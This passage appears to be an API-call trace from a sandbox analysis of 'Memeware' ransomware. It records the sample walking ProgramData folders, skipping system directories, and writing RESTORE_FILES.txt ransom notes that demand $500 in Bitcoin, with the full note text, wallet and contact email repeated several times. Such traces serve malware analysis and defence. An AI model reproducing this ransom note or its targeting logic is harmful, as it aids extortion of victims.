state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.813] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.813] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.813] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.814] CloseHandle (hObject=0xb4) returned 1 [0066.814] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.814] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.814] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 51 [0066.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.814] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.814] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.815] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.815] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.815] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.815] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.815] CloseHandle (hObject=0xa4) returned 1 [0066.815] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Windows") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files (x86)") returned -1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="$Recycle.bin") returned 1 [0066.815] lstrcmpiW (lpString1="NetFramework", lpString2="System Volume Information") returned -1 [0066.815] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0066.815] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0066.815] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0066.815] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned 43 [0066.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.816] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\.") returned 43 [0066.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.816] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.816] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\..") returned 44 [0066.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0066.817] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0066.817] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned 59 [0066.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.817] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\.") returned 59 [0066.817] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\..") returned 60 [0066.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.817] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.817] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 75 [0066.818] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.831] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.831] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.831] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.831] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.832] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.832] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.832] CloseHandle (hObject=0xb4) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.832] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.832] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 59 [0066.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.832] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.832] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.833] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.833] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.833] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.833] CloseHandle (hObject=0xa4) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0066.833] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0066.833] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0066.834] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned 38 [0066.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.834] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\.") returned 38 [0066.834] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.834] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.834] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\..") returned 39 [0066.834] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.834] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0066.834] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0066.834] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0066.834] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0066.834] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0066.834] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned 50 [0066.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\.") returned 50 [0066.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.835] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.835] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.835] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\..") returned 51 [0066.835] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.835] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.835] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.835] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 66 [0066.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.836] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour 